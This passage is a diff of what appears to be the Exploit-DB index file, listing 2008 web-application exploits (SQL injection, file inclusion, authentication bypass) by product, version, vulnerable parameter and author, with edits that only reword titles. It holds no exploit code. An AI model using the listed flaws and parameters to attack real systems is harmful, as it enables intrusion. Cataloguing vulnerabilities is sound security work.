Bypass",2008-11-08,Stack,php,webapps,0 7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - Authentication Bypass",2008-11-09,Cyber-Zone,php,webapps,0 -7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - 'adid' Parameter SQL Injection",2008-11-09,"Hussin X",php,webapps,0 +7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - 'adid' SQL Injection",2008-11-09,"Hussin X",php,webapps,0 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0 7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-11-09,"Andreas Kurtz",jsp,webapps,0 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload",2008-11-10,USH,php,webapps,0 -7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - 'Tipo' Parameter Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 -7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection",2008-11-10,boom3rang,php,webapps,0 +7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - 'Tipo' Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 +7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection",2008-11-10,boom3rang,php,webapps,0 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 7081,platforms/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 @@ -20723,17 +20724,17 @@ id,file,description,date,author,platform,type,port 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 7087,platforms/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 -7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - 'book_id' Parameter SQL Injection",2008-11-11,boom3rang,php,webapps,0 +7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - 'book_id' SQL Injection",2008-11-11,boom3rang,php,webapps,0 7093,platforms/php/webapps/7093.txt,"Joomla! Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,php,webapps,0 7094,platforms/php/webapps/7094.txt,"Pre Real Estate Listings - Arbitrary File Upload",2008-11-11,BackDoor,php,webapps,0 -7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component com_catalogproduction - 'id' Parameter SQL Injection",2008-11-11,boom3rang,php,webapps,0 +7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component com_catalogproduction - 'id' SQL Injection",2008-11-11,boom3rang,php,webapps,0 7096,platforms/php/webapps/7096.txt,"Joomla! Component Simple RSS Reader 1.0 - Remote File Inclusion",2008-11-11,NoGe,php,webapps,0 7097,platforms/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0 -7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' Parameter SQL Injection",2008-11-11,"Hussin X",php,webapps,0 +7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0 7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,php,webapps,0 7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro 1.6 - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0 7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0 -7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'id' Parameter SQL Injection",2008-11-12,"Hussin X",php,webapps,0 +7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",php,webapps,0 7106,platforms/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps,0 7107,platforms/php/webapps/7107.txt,"TurnkeyForms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0 @@ -20750,29 +20751,29 @@ id,file,description,date,author,platform,type,port 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0 7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0 7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0 -7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0 +7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' SQL Injection",2008-11-15,snakespc,php,webapps,0 7130,platforms/php/webapps/7130.php,"Minigal b13 - Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0 -7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' Parameter SQL Injection",2008-11-16,snakespc,php,webapps,0 +7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps,0 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps,0 -7134,platforms/php/webapps/7134.txt,"PHPstore Wholesale - 'id' Parameter SQL Injection",2008-11-16,"Hussin X",php,webapps,0 +7134,platforms/php/webapps/7134.txt,"PHPstore Wholesale - 'id' SQL Injection",2008-11-16,"Hussin X",php,webapps,0 7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0 7137,platforms/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0 -7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - 'group' Parameter Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 +7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - 'group' Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0 7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0 -7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0 +7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0 7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - Authentication Bypass",2008-11-17,d3b4g,php,webapps,0 7147,platforms/php/webapps/7147.txt,"SaturnCMS - Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 -7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0 +7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' SQL Injection",2008-11-17,eek,php,webapps,0 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0 -7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 -7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - 'API_HOME_DIR' Parameter Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 +7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 +7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - 'API_HOME_DIR' Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 -7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusion",2008-11-19,StAkeR,php,webapps,0 +7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusions",2008-11-19,StAkeR,php,webapps,0 7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - SQL Injection",2008-11-19,cOndemned,php,webapps,0 7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0 7163,platforms/php/webapps/7163.txt,"RevSense 1.0 - Authentication Bypass",2008-11-19,d3b4g,php,webapps,0 @@ -20789,14 +20790,14 @@ id,file,description,date,author,platform,type,port 7179,platforms/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0 7180,platforms/php/webapps/7180.txt,"VCalendar - Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 -7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' Parameter SQL Injection",2008-11-22,NoGe,php,webapps,0 +7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' SQL Injection",2008-11-22,NoGe,php,webapps,0 7185,platforms/php/webapps/7185.php,"Discuz! - Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0 7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0 7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps,0 -7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' Parameter SQL Injection",2008-11-23,snakespc,php,webapps,0 +7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' SQL Injection",2008-11-23,snakespc,php,webapps,0 7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps,0 7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - SQL Injection",2008-11-23,snakespc,php,webapps,0 7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - SQL Injection",2008-11-23,snakespc,php,webapps,0 @@ -20806,7 +20807,7 @@ id,file,description,date,author,platform,type,port 7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0 -7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - 'ad_id' Parameter SQL Injection",2008-11-24,"Hussin X",php,webapps,0 +7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - 'ad_id' SQL Injection",2008-11-24,"Hussin X",php,webapps,0 7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,php,webapps,0 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 < 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 < 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0 @@ -20815,7 +20816,7 @@ id,file,description,date,author,platform,type,port 7216,platforms/php/webapps/7216.txt,"WebStudio CMS - Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0 7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0 7218,platforms/php/webapps/7218.txt,"Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0 -7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0 +7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusions",2008-11-24,NoGe,php,webapps,0 7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - 'categorie.php' SQL Injection",2008-11-25,cOndemned,php,webapps,0 @@ -20831,7 +20832,7 @@ id,file,description,date,author,platform,type,port 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 40987,platforms/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",2017-01-03,Adam,php,webapps,0 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0 -7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 +7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 @@ -20858,11 +20859,11 @@ id,file,description,date,author,platform,type,port 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 -7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' Parameter SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 +7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - Authentication Bypass",2008-11-28,R3d-D3V!L,php,webapps,0 -7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro - 'ID' Parameter Blind SQL Injection",2008-11-28,Stack,php,webapps,0 +7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro - 'ID' Blind SQL Injection",2008-11-28,Stack,php,webapps,0 7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 -7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Parameter Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 @@ -20872,19 +20873,19 @@ id,file,description,date,author,platform,type,port 7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 -7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - 'mid' Parameter SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 +7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - 'mid' SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 7285,platforms/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,php,webapps,0 7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Config File Disclosure",2008-11-29,ahmadbady,php,webapps,0 7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7288,platforms/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Parameter Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 -7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Parameter Blind SQL Injection",2008-11-29,Stack,php,webapps,0 +7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 +7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Blind SQL Injection",2008-11-29,Stack,php,webapps,0 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta - Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0 7292,platforms/asp/webapps/7292.txt,"ASPThai.Net Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps,0 7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - Authentication Bypass",2008-11-29,Cyber-Zone,asp,webapps,0 -7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cid' Parameter SQL Injection",2008-11-29,"CWH Underground",php,webapps,0 -7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Parameter Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Parameter Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 +7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cid' SQL Injection",2008-11-29,"CWH Underground",php,webapps,0 +7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - Authentication Bypass",2008-11-30,R3d-D3V!L,php,webapps,0 7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 - Authentication Bypass",2008-11-30,AlpHaNiX,php,webapps,0 7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Blind SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 @@ -20893,8 +20894,8 @@ id,file,description,date,author,platform,type,port 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass",2008-11-30,NoGe,php,webapps,0 7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 -7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 -7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - 'site' Parameter SQL Injection",2008-12-01,JIKO,php,webapps,0 +7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusions",2008-11-30,NoGe,php,webapps,0 +7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - 'site' SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - Authentication Bypass",2008-12-01,t0fx,php,webapps,0 7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - Database Disclosure",2008-12-01,"CWH Underground",asp,webapps,0 @@ -20902,17 +20903,17 @@ id,file,description,date,author,platform,type,port 7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0 7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0 7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution",2008-12-02,"CWH Underground",php,webapps,0 -7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' Parameter SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 +7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,php,webapps,0 7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0 7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0 7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7328,platforms/php/webapps/7328.pl,"Check New 4.52 - SQL Injection",2008-12-03,"CWH Underground",php,webapps,0 -7331,platforms/php/webapps/7331.pl,"Joomla! Component JMovies 1.1 - 'id' Parameter SQL Injection",2008-12-03,StAkeR,php,webapps,0 +7331,platforms/php/webapps/7331.pl,"Joomla! Component JMovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - Authentication Bypass",2008-12-03,b3hz4d,php,webapps,0 7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 -7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - 'cct_base' Parameter Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0 +7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - 'cct_base' Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0 7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",php,webapps,0 7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb' Database Disclosure",2008-12-04,AlpHaNiX,php,webapps,0 7339,platforms/php/webapps/7339.txt,"template creature - SQL Injection / File Disclosure",2008-12-04,ZoRLu,php,webapps,0 @@ -20924,7 +20925,7 @@ id,file,description,date,author,platform,type,port 7345,platforms/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 7348,platforms/asp/webapps/7348.txt,"merlix educate servert - Authentication Bypass / File Disclosure",2008-12-05,ZoRLu,asp,webapps,0 -7349,platforms/asp/webapps/7349.txt,"RankEm - 'siteID' Parameter SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 +7349,platforms/asp/webapps/7349.txt,"RankEm - 'siteID' SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7350,platforms/asp/webapps/7350.txt,"Rankem - Authentication Bypass",2008-12-05,AlpHaNiX,asp,webapps,0 7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure",2008-12-05,AlpHaNiX,php,webapps,0 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - File Disclosure/Bypass",2008-12-05,ZoRLu,php,webapps,0 @@ -20935,7 +20936,7 @@ id,file,description,date,author,platform,type,port 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 -7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - '_language' Parameter Local File Inclusion",2008-12-06,dun,php,webapps,0 +7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - '_language' Local File Inclusion",2008-12-06,dun,php,webapps,0 7364,platforms/php/webapps/7364.php,"IPNPro3 < 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 @@ -20946,13 +20947,13 @@ id,file,description,date,author,platform,type,port 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0 -7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 +7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusions",2008-12-07,cOndemned,php,webapps,0 7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal",2008-12-07,zAx,php,webapps,0 7378,platforms/asp/webapps/7378.txt,"asp talk - SQL Injection / Cross-Site Scripting",2008-12-07,Bl@ckbe@rD,asp,webapps,0 -7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'filename' Parameter Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 -7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0 